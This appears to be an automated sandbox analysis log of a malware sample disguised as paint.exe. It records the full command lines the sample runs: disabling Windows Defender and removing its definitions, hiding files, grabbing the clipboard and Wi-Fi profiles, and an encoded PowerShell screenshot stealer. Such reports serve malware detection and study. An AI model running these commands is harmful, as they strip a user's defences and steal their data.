              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9974962767568659
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9947765261627907
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@177/96@2/2
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DECAFC GetLastError,FormatMessageW,88_2_00007FF623DECAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623E1B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,88_2_00007FF623E1B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DEEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,88_2_00007FF623DEEF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeCode function: 88_2_00007FF623DF3144 GetDiskFreeSpaceExW,88_2_00007FF623DF3144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8572:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
              Source: C:\Users\user\Desktop\paint.exeMutant created: \Sessions\1\BaseNamedObjects\X
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8676:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8508:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8784:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8276:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8768:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1072:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9168:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8540:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2640:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8516:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9064:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8860:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9024:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8940:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
              Source: C:\Users\user\Desktop\paint.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67162Jump to behavior
              Source: paint.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\paint.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: paint.exeVirustotal: Detection: 43%
              Source: paint.exeReversingLabs: Detection: 36%
              Source: paint.exeString found in binary or memory: set-addPolicy
              Source: paint.exeString found in binary or memory: id-cmc-addExtensions
              Source: paint.exeString found in binary or memory: can't send non-None value to a just-started coroutine
              Source: paint.exeString found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
              Source: paint.exeString found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
              Source: paint.exeString found in binary or memory: --help
              Source: paint.exeString found in binary or memory: --help
              Source: paint.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: paint.exeString found in binary or memory: can't send non-None value to a just-started async generator
              Source: C:\Users\user\Desktop\paint.exeFile read: C:\Users\user\Desktop\paint.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\paint.exe "C:\Users\user\Desktop\paint.exe"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Users\user\Desktop\paint.exe "C:\Users\user\Desktop\paint.exe"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\paint.exe""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\paint.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
